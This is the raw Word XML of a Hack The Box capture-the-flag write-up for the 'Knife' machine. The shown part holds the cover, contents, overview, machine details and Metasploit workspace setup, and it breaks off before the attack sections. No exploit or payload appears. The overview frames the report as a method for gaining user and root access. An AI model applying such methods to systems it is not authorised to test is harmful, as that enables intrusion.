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56A1A" w14:textId="051FE5FF" w:rsidR="00630F26" w:rsidRDefault="009A3BF6" w:rsidP="00F20A01"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83B90A1" wp14:editId="2E13513C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4869873</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>-76200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3099435" cy="10241280"/>
                <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
                <wp:wrapNone/>
                <wp:docPr id="453" name="Group 4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9435" cy="10241280"/>
                          <a:chOff x="0" y="-182880"/>
                          <a:chExt cx="3099817" cy="10241280"/>
                        </a:xfrm>
                        <a:solidFill>
                          <a:schemeClr val="accent5">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="459" name="Rectangle 459" descr="Light vertical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38545" cy="10058400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60" name="Rectangle 460"/>
                        <wps:cNvSpPr>
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="126107" y="0"/>
                            <a:ext cx="2971800" cy="10058400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D8D8D8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" name="Rectangle 461"/>
                        <wps:cNvSpPr>
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1" y="-182880"/>
                            <a:ext cx="3099816" cy="2377440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6525591" w14:textId="0ABE42B8" w:rsidR="001A2CCA" w:rsidRDefault="001A2CCA">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:rPr>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  <w:sz w:val="96"/>
                                  <w:szCs w:val="96"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p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  <wps:wsp>
                        <wps:cNvPr id="462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6761018"/>
                            <a:ext cx="3089515" cy="2833370"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:grpFill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53882" dir="2700000" algn="ctr" rotWithShape="0">
                                    <a:srgbClr val="D8D8D8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uthor"/>
                                <w:id w:val="1380359617"/>
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47049478" w14:textId="4F93E29C" w:rsidR="001A2CCA" w:rsidRDefault="00475961">
                                  <w:pPr>
                                    <w:pStyle w:val="NoSpacing"/>
                                    <w:spacing w:line="360" w:lineRule="auto"/>
                                    <w:rPr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</w:rPr>
                                    <w:t>John Howden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vert="horz" wrap="square" lIns="365760" tIns="182880" rIns="182880" bIns="182880" anchor="b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3B90A1" id="Group 453" o:spid="_x0000_s1026" style="position:absolute;margin-left:383.45pt;margin-top:-6pt;width:244.05pt;height:806.4pt;z-index:251659264;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin=",-1828" coordsize="30998,1024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">
                <v:rect id="Rectangle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" filled="f" stroked="f" strokecolor="white" strokeweight="1pt">
                  <v:shadow color="#d8d8d8" offset="3pt,3pt"/>
                </v:rect>
                <v:rect id="Rectangle 460" o:spid="_x0000_s1028" style="position:absolute;left:1261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" filled="f" stroked="f" strokecolor="#d8d8d8"/>
                <v:rect id="Rectangle 461" o:spid="_x0000_s1029" style="position:absolute;top:-1828;width:30998;height:2377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" filled="f" stroked="f" strokecolor="white" strokeweight="1pt">
                  <v:shadow color="#d8d8d8" offset="3pt,3pt"/>
                  <v:textbox inset="28.8pt,14.4pt,14.4pt,14.4pt">
                    <w:txbxContent>
                      <w:p w14:paraId="26525591" w14:textId="0ABE42B8" w:rsidR="001A2CCA" w:rsidRDefault="001A2CCA">
                        <w:pPr>
                          <w:pStyle w:val="NoSpacing"/>
                          <w:rPr>
                            <w:color w:val="FFFFFF" w:themeColor="background1"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v:rect id="Rectangle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" filled="f" stroked="f" strokecolor="white" strokeweight="1pt">
                  <v:shadow color="#d8d8d8" offset="3pt,3p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id w:val="1380359617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14:paraId="47049478" w14:textId="4F93E29C" w:rsidR="001A2CCA" w:rsidRDefault="00475961">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing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John Howden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7B47D287" w14:textId="53F9DBDB" w:rsidR="002C7E46" w:rsidRDefault="002C7E46" w:rsidP="002C7E46"/>
    <w:p w14:paraId="65AEA451" w14:textId="44603E86" w:rsidR="002C7E46" w:rsidRDefault="002C7E46" w:rsidP="002C7E46"/>
    <w:p w14:paraId="3B4B72B9" w14:textId="587CE717" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="4ABA4CEC" w14:textId="6825E554" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="10DBC16D" w14:textId="53A8EDD5" w:rsidR="00F20A01" w:rsidRDefault="00171788" w:rsidP="002C7E46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6F715278" wp14:editId="12B8F7B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2688590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6970395" cy="640080"/>
                <wp:effectExtent l="0" t="0" r="15875" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="463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970395" cy="64008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19050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  <w:alias w:val="Title"/>
                              <w:id w:val="-1704864950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7D993DD" w14:textId="01ADF8F8" w:rsidR="001A2CCA" w:rsidRDefault="001A2CCA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Hack the Box </w:t>
                                </w:r>
                                <w:r w:rsidR="00BD2810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- </w:t>
                                </w:r>
                                <w:r w:rsidR="007847AF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Knife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182880" tIns="45720" rIns="182880" bIns="45720" anchor="ctr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90000</wp14:pctWidth>
                </wp14:sizeRelH>
                <wp14:sizeRelV relativeFrom="page">
                  <wp14:pctHeight>7300</wp14:pctHeight>
                </wp14:sizeRelV>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="6F715278" id="Rectangle 16" o:spid="_x0000_s1031" style="position:absolute;margin-left:0;margin-top:211.7pt;width:548.85pt;height:50.4pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:900;mso-height-percent:73;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:left;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-width-percent:900;mso-height-percent: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" o:allowincell="f" fillcolor="black [3213]" strokecolor="black [3213]" strokeweight="1.5pt">
                <v:textbox style="mso-fit-shape-to-text:t" inset="14.4pt,,14.4pt">
                  <w:txbxContent>
                    <w:sdt>
                      <w:sdtPr>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="72"/>
                          <w:szCs w:val="72"/>
                        </w:rPr>
                        <w:alias w:val="Title"/>
                        <w:id w:val="-1704864950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14:paraId="17D993DD" w14:textId="01ADF8F8" w:rsidR="001A2CCA" w:rsidRDefault="001A2CCA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</w:pPr>
                          <w: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t xml:space="preserve">Hack the Box </w:t>
                          </w:r>
                          <w:r w:rsidR="00BD2810"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t xml:space="preserve">- </w:t>
                          </w:r>
                          <w:r w:rsidR="007847AF"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t>Knife</w:t>
                          </w:r>
                        </w:p>
                      </w:sdtContent>
                    </w:sdt>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="40047587" w14:textId="04345168" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="3756B8EC" w14:textId="1708CBC4" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="6357FC3D" w14:textId="160BFD21" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="31433820" w14:textId="676989D0" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="25C2A8CB" w14:textId="0814A92A" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="14B041F3" w14:textId="2FCAF864" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="266CB03B" w14:textId="32B198BB" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="623D1AD8" w14:textId="5D3BB34C" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="565A5ADA" w14:textId="635C3AC7" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="6447DF79" w14:textId="34551679" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="3F4C00EA" w14:textId="61CBEC7E" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="673C95A8" w14:textId="1A463FDA" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="140C3E4D" w14:textId="34BEDAFA" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="18E37BD8" w14:textId="6A12CAD5" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="6DFC4483" w14:textId="01DD4E74" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="22176B2B" w14:textId="77771ED8" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="2FE74D97" w14:textId="57985CEA" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="0B316CA8" w14:textId="02220EE0" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="6FA1506F" w14:textId="1A97A0D9" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="46026C3D" w14:textId="65FF3DF8" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="0BF93CD2" w14:textId="739F0313" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="3645F859" w14:textId="35553F55" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="23B66AAE" w14:textId="79E5597B" w:rsidR="00F20A01" w:rsidRDefault="00F20A01" w:rsidP="002C7E46"/>
    <w:p w14:paraId="6EA6CE60" w14:textId="77777777" w:rsidR="00475961" w:rsidRDefault="00475961" w:rsidP="002C7E46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86327896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038857E" w14:textId="10429B24" w:rsidR="00164D12" w:rsidRPr="004A099C" w:rsidRDefault="00164D12">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rStyle w:val="Heading2Char"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="004A099C">
            <w:rPr>
              <w:rStyle w:val="Heading2Char"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6264B6A9" w14:textId="5540AA5E" w:rsidR="00C3269D" w:rsidRDefault="00164D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4569231" w:history="1">
            <w:r w:rsidR="00C3269D" w:rsidRPr="00840D0C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview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1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1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4CC05AAB" w14:textId="619C2CEB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2" w:history="1">
            <w:r w:rsidR="00C3269D" w:rsidRPr="00840D0C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Machine details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2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1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0A6333D5" w14:textId="270C238B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3" w:history="1">
            <w:r w:rsidR="00C3269D" w:rsidRPr="00840D0C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Preparation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3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1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1AC82076" w14:textId="6FE9E311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4" w:history="1">
            <w:r w:rsidR="00C3269D" w:rsidRPr="00840D0C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enumeration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4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2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0A921D8C" w14:textId="5175667E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5" w:history="1">
            <w:r w:rsidR="00C3269D" w:rsidRPr="00840D0C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gaining a foothold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5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3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22842CB3" w14:textId="25A78946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6" w:history="1">
            <w:r w:rsidR="00C3269D" w:rsidRPr="00840D0C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege escalation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6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5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43B38247" w14:textId="52064136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7" w:history="1">
            <w:r w:rsidR="00C3269D" w:rsidRPr="00840D0C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary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7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9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5899C0EC" w14:textId="0B56E94A" w:rsidR="00C3269D" w:rsidRDefault="009A3BF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74569238" w:history="1">
            <w:r w:rsidR="00C3269D" w:rsidRPr="00840D0C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00C3269D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C3269D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C3269D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc74569238 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C3269D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C3269D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C3269D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00C3269D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FA90BC3" w14:textId="1D8B037D" w:rsidR="00456877" w:rsidRPr="00456877" w:rsidRDefault="00164D12" w:rsidP="00456877">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5EA0B60D" w14:textId="77777777" w:rsidR="00F873A2" w:rsidRDefault="00F873A2" w:rsidP="004A099C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C1DF9F" w14:textId="54F1E310" w:rsidR="00A44204" w:rsidRDefault="00CA5F0F" w:rsidP="004A099C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc74569231"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5D6B9BC6" w14:textId="1A6B1A78" w:rsidR="001E7CD0" w:rsidRDefault="00A83F47" w:rsidP="009B60AA">
      <w:r>
        <w:t xml:space="preserve">This report </w:t>
      </w:r>
      <w:r w:rsidR="0059006F">
        <w:t>explains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE7831">
        <w:t xml:space="preserve">the method used to </w:t>
      </w:r>
      <w:r w:rsidR="00E34D3B">
        <w:t xml:space="preserve">compromise </w:t>
      </w:r>
      <w:r w:rsidR="00A14D72">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="003F21B0">
        <w:t xml:space="preserve">gain </w:t>
      </w:r>
      <w:r w:rsidR="00A25650">
        <w:t xml:space="preserve">standard </w:t>
      </w:r>
      <w:r w:rsidR="0059006F">
        <w:t>user access</w:t>
      </w:r>
      <w:r w:rsidR="003F21B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A25650">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00BE7831">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00BE7831">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="008A476C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Knife</w:t>
      </w:r>
      <w:r w:rsidR="00BE7831">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00BE7831">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B31F39">
        <w:t xml:space="preserve">virtual machine </w:t>
      </w:r>
      <w:r w:rsidR="00A25650">
        <w:t xml:space="preserve">and to further escalate </w:t>
      </w:r>
      <w:r w:rsidR="00631399">
        <w:t xml:space="preserve">the attack to gain administrative </w:t>
      </w:r>
      <w:r w:rsidR="009F4603">
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="009A2B3D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0019276B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F4797">
        <w:t>Two flags/hashes must be captured to complete the machine</w:t>
      </w:r>
      <w:r w:rsidR="00F91AF1">
        <w:t>, these consist of a user flag and a root flag.</w:t>
      </w:r>
      <w:r w:rsidR="00C33F37">
        <w:t xml:space="preserve"> Once a flag is </w:t>
      </w:r>
      <w:r w:rsidR="001E52BC">
        <w:t xml:space="preserve">copied it should be submitted to the </w:t>
      </w:r>
      <w:r w:rsidR="00B72909">
        <w:t>machine flag submission box on the HTB website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E33EAB" w14:textId="7019D470" w:rsidR="00E72A2F" w:rsidRPr="00DF6543" w:rsidRDefault="00DF6543" w:rsidP="009B60AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Throughout this document s</w:t>
      </w:r>
      <w:r w:rsidR="00432982">
        <w:t>ystem commands</w:t>
      </w:r>
      <w:r w:rsidR="00A22ACA">
        <w:t xml:space="preserve"> and code examples</w:t>
      </w:r>
      <w:r w:rsidR="00432982">
        <w:t xml:space="preserve"> are formatted using  </w:t>
      </w:r>
      <w:r w:rsidR="0052240C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Italic Courier</w:t>
      </w:r>
      <w:r w:rsidR="000D18A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0052240C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ne</w:t>
      </w:r>
      <w:r w:rsidR="00432777">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>w font</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C179A78" w14:textId="77777777" w:rsidR="00716A7E" w:rsidRDefault="00716A7E" w:rsidP="007A2B52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB9DF0E" w14:textId="7ECA1F29" w:rsidR="007A2B52" w:rsidRDefault="00864881" w:rsidP="007A2B52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc74569232"/>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00771737">
        <w:t>achine details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="47B9BE57" w14:textId="6D1369D4" w:rsidR="009971B2" w:rsidRDefault="00A0484C" w:rsidP="00771737">
      <w:r>
        <w:t>Difficulty:</w:t>
      </w:r>
      <w:r w:rsidR="009971B2">
        <w:t xml:space="preserve"> Easy</w:t>
      </w:r>
      <w:r w:rsidR="00BB1661">
        <w:br/>
        <w:t xml:space="preserve">Machine rating: </w:t>
      </w:r>
      <w:r w:rsidR="00F73B91">
        <w:t>3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AEE46D" w14:textId="2C17DAF1" w:rsidR="00AC2D37" w:rsidRDefault="00AC2D37" w:rsidP="00771737"/>
    <w:p w14:paraId="2A37122A" w14:textId="60359B2F" w:rsidR="00AC763C" w:rsidRDefault="00381531" w:rsidP="00AC763C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc74569233"/>
      <w:r>
        <w:t>Preparation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="038F47B3" w14:textId="162F9555" w:rsidR="00DE08E2" w:rsidRPr="00DE08E2" w:rsidRDefault="00DE08E2" w:rsidP="00DE08E2">
      <w:r>
        <w:t xml:space="preserve">Connect to </w:t>
      </w:r>
      <w:r w:rsidR="005D7AB9">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hack </w:t>
      </w:r>
      <w:r w:rsidR="00B5274D">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>he Box VPN server</w:t>
      </w:r>
      <w:r w:rsidR="00B5274D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614D5EAC" w14:textId="7ABD496E" w:rsidR="001F18D7" w:rsidRDefault="00C43146" w:rsidP="00381531">
      <w:r>
        <w:t xml:space="preserve">Create a workspace inside Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="00737938">
        <w:t>to allow the use of the postgreql database</w:t>
      </w:r>
      <w:r w:rsidR="00DD7858">
        <w:t xml:space="preserve"> to save the results of </w:t>
      </w:r>
      <w:r w:rsidR="003E2345">
        <w:t>nmap scans</w:t>
      </w:r>
      <w:r w:rsidR="00086D13">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003E2345">
        <w:t xml:space="preserve"> host</w:t>
      </w:r>
      <w:r w:rsidR="00086D13">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003E2345">
        <w:t>, service</w:t>
      </w:r>
      <w:r w:rsidR="00086D13">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003E2345">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00826988">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="003E2345">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A94B23">
        <w:t>vulnerability details etc.</w:t>
      </w:r>
      <w:r w:rsidR="000F60AF">
        <w:t xml:space="preserve"> The best way to start Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="002A2454">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00B5274D">
        <w:t>via</w:t>
      </w:r>
      <w:r w:rsidR="002A2454">
        <w:t xml:space="preserve"> the applications menu</w:t>
      </w:r>
      <w:r w:rsidR="00B5274D">
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="002A2454">
        <w:t xml:space="preserve">his way the database is automatically started and configured without requiring any additional </w:t>
      </w:r>
      <w:r w:rsidR="00F01139">
        <w:t xml:space="preserve">terminal </w:t>
      </w:r>
      <w:r w:rsidR="002A2454">
        <w:t>commands.</w:t>
      </w:r>
      <w:r w:rsidR="00E34802">
        <w:t xml:space="preserve"> Once loaded enter </w:t>
      </w:r>
      <w:r w:rsidR="00F87D76">
        <w:t>the command below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B08DBB" w14:textId="77777777" w:rsidR="003712E7" w:rsidRDefault="003712E7" w:rsidP="00381531"/>
    <w:p w14:paraId="59AFF3B4" w14:textId="203A2357" w:rsidR="001F18D7" w:rsidRDefault="006A6602" w:rsidP="003712E7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00481E8B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>workspace -a knife</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A835D" w14:textId="77777777" w:rsidR="003712E7" w:rsidRDefault="003712E7" w:rsidP="003712E7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1083919A" w14:textId="2E630B42" w:rsidR="001F4F39" w:rsidRDefault="00FB0DDA" w:rsidP="001F4F3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0C46D8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> option </w:t>
      </w:r>
      <w:r w:rsidR="0065005B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">followed by a name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidR="00136AA6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> a new workspace</w:t>
      </w:r>
      <w:r w:rsidR="0065005B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC088F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>with the supplied name</w:t>
      </w:r>
      <w:r w:rsidR="00F075BB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BC088F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E941FD">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>After creation</w:t>
      </w:r>
      <w:r w:rsidR="00CD0373">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E941FD">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>you will be working inside the new workspace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E092C" w14:textId="77777777" w:rsidR="0008077B" w:rsidRDefault="0008077B" w:rsidP="0008077B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0008077B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B87A2C7" wp14:editId="0D7C7487">
            <wp:extent cx="3143689" cy="8383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3AD02" w14:textId="5DE4E430" w:rsidR="0008077B" w:rsidRDefault="0008077B" w:rsidP="0008077B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
